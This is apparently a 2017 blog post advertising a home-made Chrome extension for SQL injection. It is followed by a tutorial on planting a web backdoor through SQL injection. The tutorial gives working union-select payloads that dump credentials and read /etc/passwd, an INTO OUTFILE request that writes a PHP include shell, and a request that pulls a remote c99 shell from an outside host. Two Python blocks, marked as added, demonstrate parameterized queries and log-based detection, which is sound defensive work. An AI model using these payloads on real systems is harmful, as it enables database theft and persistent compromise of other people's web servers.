Monday, June 5, 2017

A powerful Chrome extension SQL injector made by me.

Download Here

SQL-Injector

A Chrome extension for SQL injection using union-based and error-based techniques.

How To Install:

Go to chrome://extension, then drag and drop the SQL Injector folder. To open it, go to the options of the Chrome extension.

How To Use:

To use this tool, simply put your target URL in the url textbox.
Put '_INJECTHERE_' (without quotes) where the tool will inject.
Example:
http://leettime.net/sqlninja.com/tasks/basic_ch1.php?id=1_INJECTHERE_
Click the start button and it will start checking whether the target is vulnerable or not.
First the tool will check if the page changes on every visit.
If it does, you need to take a piece of text that appears in the normal page.
Example:
website.com/page.php?id=19
Costs: 5 pesos only!
website.com/page.php?id=19'
Costs: only!
You see that the text '5 pesos' disappears.
So put that phrase in normalPageKeyword and click start again.
After that, the tool will check if there's a difference between the normal page and the errored page (the URL with a quote, id=19').
If the normal page is the same as the error page, then maybe it's not vulnerable, so you gotta find another target URL.
If it's not the same as the error page, the tool will now try to find the right comment.
There are different types of comment depending on the SQL syntax:
'--+
--
#
)--+
')--+
"--+
etc.
If the tool cannot find the right comment, you may need to find it yourself and put it in the comment textbox.
For example, if the right comment is " '--+ ", put " '_PAYLOAD--+ " in the comment textbox, then click start again.
Then the tool will start trying to get the number of columns.
It will try the ORDER BY and GROUP BY methods.
If the tool can't, you gotta count them yourself and put the number in the numberOfColumns textbox.
Then the tool will start trying to get the injectable columns.
If the tool can't, you gotta find them yourself and put them in the injectableColumn textbox.
Now that you have the comment type, the number of columns and the injectable columns,
you can start gathering information.
First, try clicking to get version, user and currentDB.
After that, click the [GET] button in the database panel.
It will dump the database names. If you already have the database name, you can put it in the addDatabase textbox, then click the '>' button.
Then select the database you want and click [GET] in the table panel to get the tables.
The same goes for the columns.
After that you can dump the data.
You can select multiple columns to dump.
For example:
If you chose the username column and the password column,
it will be username,0x3a,password
The 0x3a is ':', which separates the username and password.
result: admin:admin123,test1:testing123,z3r:z3r19
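
The quote and UNION checks described above only succeed when the id value is concatenated into the SQL text. As an added example (not part of the extension or the original post), this Python sketch runs the same three kinds of input against a concatenated query and a parameterized one; the in-memory SQLite database, its rows and all function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed rows standing in for the page behind page.php?id=19.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id TEXT, label TEXT, price TEXT)")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO items VALUES ('19', 'Costs', '5 pesos')")
    db.execute("INSERT INTO users VALUES ('admin', 'admin123')")
    return db

def lookup_concat(db, item_id):
    # Before: the parameter is pasted into the SQL text, so a quote ends
    # the string literal and whatever follows is parsed as SQL.
    sql = "SELECT label, price FROM items WHERE id = '" + item_id + "'"
    try:
        return db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)

def lookup_bound(db, item_id):
    # After: the value is bound as a parameter and is only ever data.
    sql = "SELECT label, price FROM items WHERE id = ?"
    return db.execute(sql, (item_id,)).fetchall()

# The three kinds of input the tool sends: normal, quote, UNION read.
PROBES = {
    "normal": "19",
    "quote": "19'",
    "union": "19' and 1=0 union select username, password from users--",
}

def run_probes(lookup):
    db = make_db()
    return {name: lookup(db, value) for name, value in PROBES.items()}

def leaks_other_table(lookup):
    # Regression check for a test suite: True if the UNION input
    # returned a row from the users table.
    rows = run_probes(lookup)["union"]
    return isinstance(rows, list) and ("admin", "admin123") in rows

if __name__ == "__main__":
    for fn in (lookup_concat, lookup_bound):
        print(fn.__name__, run_probes(fn), "leaks:", leaks_other_table(fn))
```

With the bound query the quote and UNION inputs simply match no row, so there is no error page and no second result set to read from.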

SQL Injection Uploading shell using root file privileges 70% Noob

!! FOR EDUCATIONAL PURPOSES ONLY  !!

I Introduction
So today I'm gonna teach you how to upload a shell using SQL injection.

II Getting User
So first, get the user using
user()
Or
(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES)

www.website.com/news.php?id=19' and false union select 1,user(),3,4,5,6,7,8,9--+

www.website.com/news.php?id=19' and false union select 1,(SELECT+GROUP_CONCAT(GRANTEE,0x202d3e20,IS_GRANTABLE,0x3c62723e)+FROM+INFORMATION_SCHEMA.USER_PRIVILEGES),3,4,5,6,7,8,9--+

If the user is root or the user's privilege is Y or Yes, then you're good to go.

III Getting the Full Path Disclosure
I've written a tutorial on how to get the Full Path Disclosure here.

Note: if you can't get the Full Path Disclosure, there's no way you can upload your shell, because you don't know where to save your backdoor shell.

Tips: Getting Full Path Disclosure

For some tips: if you really want to know the FPD, try reading the server's "/etc/passwd" using load_file().

www.website.com/news.php?id=19' and false union select 1,load_file("/etc/passwd"),3,4,5,6,7,8,9--+

Or if you still can't, try guessing the FPD. The common ones are "/var/www/", "/var/www/sitename", etc.

To make sure that they're correct, try "/var/www/index.php" and visit www.website.com/index.php, then check if the source code is similar or the same.

IV Uploading the shell
Now that we have the full path disclosure, we can try uploading the shell. We're gonna use this script as our backdoor initiator:
<?php include $_GET["inc"];?>
www.website.com/news.php?id=19' and false union select 1,'<?php include($_GET["inc"]);?>',3,4,5,6,7,8,9 into outfile '/var/www/shell.php'--+
So once we visit that URL, we go here:

www.website.com/shell.php?inc=http://examplebackdoorwebsite.com/c99.txt

And voilà! You have successfully inserted a PHP backdoor in the website!

If it's 404 not found, then maybe the directory is not writable. You gotta find a directory that is writable.
The common writable directories are:
/uploads/
/images/
/videos/
or something like that.
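
The requests in sections II to IV leave recognisable traces in the web server's access log. As an added example (not from the original post), this Python sketch tags those traces and flags the case where a file named in an INTO OUTFILE request is later served with status 200; the log lines, IP addresses, host names and rule names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IPs, shortened column lists).
SAMPLE_LOG = [
    '198.51.100.20 - - [05/Jun/2017:10:00:00 +0000] "GET /news.php?id=19 HTTP/1.1" 200 900',
    '203.0.113.7 - - [05/Jun/2017:10:01:00 +0000] "GET /news.php?id=19%27+and+false+union+select+1,user(),3--+ HTTP/1.1" 200 640',
    '203.0.113.7 - - [05/Jun/2017:10:02:00 +0000] "GET /news.php?id=19%27+and+false+union+select+1,load_file(%22/etc/passwd%22),3--+ HTTP/1.1" 200 2100',
    '203.0.113.7 - - [05/Jun/2017:10:03:00 +0000] "GET /news.php?id=19%27+and+false+union+select+1,%27x%27,3+into+outfile+%27/var/www/shell.php%27--+ HTTP/1.1" 200 610',
    '203.0.113.7 - - [05/Jun/2017:10:04:00 +0000] "GET /shell.php?inc=http://backdoor.example/c99.txt HTTP/1.1" 200 4096',
]

LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')
RULES = {  # indicators taken from the requests shown on this page
    "union-select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "schema-enum": re.compile(r"information_schema", re.I),
    "file-read": re.compile(r"load_file\s*\(", re.I),
    "file-write": re.compile(r"into\s+outfile", re.I),
    "url-in-param": re.compile(r"[?&][^=&]+=https?://", re.I),
}
OUTFILE = re.compile(r"into\s+outfile\s+['\"]([^'\"]+)['\"]", re.I)

def scan(lines):
    """Return (ip, path, status, tags) for every suspicious request."""
    findings, dropped = [], set()
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ip, status = m.group(1), int(m.group(3))
        target = unquote_plus(m.group(2))  # %27 -> ', + -> space
        tags = [name for name, rx in RULES.items() if rx.search(target)]
        out = OUTFILE.search(target)
        if out:  # remember the file name the request tried to write
            dropped.add(out.group(1).rsplit("/", 1)[-1])
        path = target.split("?", 1)[0]
        if status == 200 and path.rsplit("/", 1)[-1] in dropped:
            tags.append("dropped-file-served")  # the write succeeded
        if tags:
            findings.append((ip, path, status, tags))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

INTO OUTFILE and load_file() both require the MySQL FILE privilege and are restricted by secure_file_priv, and including a URL requires PHP's allow_url_include to be on. An application database account without FILE, together with those two settings locked down, stops the chain before section IV.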

V Goodbye
Hope you learned something with my tutorial! I guess it's your job to enhance and explore. Good luck and have fun hacking!!